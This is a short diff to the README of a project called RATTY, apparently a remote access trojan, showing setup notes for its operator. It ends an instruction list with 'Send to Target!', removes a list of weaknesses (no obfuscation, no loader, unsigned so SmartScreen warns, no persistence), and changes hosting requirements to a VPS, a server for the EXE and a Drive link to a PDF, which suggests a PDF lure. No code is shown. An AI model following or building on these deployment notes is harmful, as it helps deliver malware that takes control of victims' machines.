that-dog-eater/RATTY/README.md

 3. Send to Target!

-### Cons
-- no obfuscation
-- no loader
-- not a certified script = smart screen pop-up
-- no persistance

 ### Requirments
 - .NET 9.0 installed
 - dotnet added to Path for compiling
 - VPS server
-- GitHub account to host PDF + EXE
+- server to host EXE
+- Drive link to PDF